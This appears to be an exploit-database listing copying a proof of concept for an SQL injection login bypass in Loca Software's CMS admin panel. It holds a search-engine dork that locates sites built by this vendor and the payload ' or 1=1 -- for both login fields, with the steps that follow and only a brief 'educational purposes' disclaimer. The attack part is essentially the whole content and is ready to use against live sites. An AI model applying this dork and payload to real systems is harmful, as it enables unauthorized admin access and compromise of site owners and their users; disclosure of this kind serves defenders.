Loca Software - Sql Injection/Admin Panel Bypass

CVE Category Price Severity
Not specified CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2024-02-03

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Loca Software - Sql Injection/Admin Panel Bypass
TITLE: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BLM TEK. LTD. T."
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
A critical SQL injection vulnerability has been identified in the admin panel login functionality of Local Software's CMS, specifically within the /cms/ directory. The vulnerability allows an attacker to bypass authentication controls by injecting arbitrary SQL queries, resulting in unauthorized access to the admin panel.
Proof of Concept (PoC):
1. Visit the admin login page, typically located at:
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Telegram: @rootninext

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.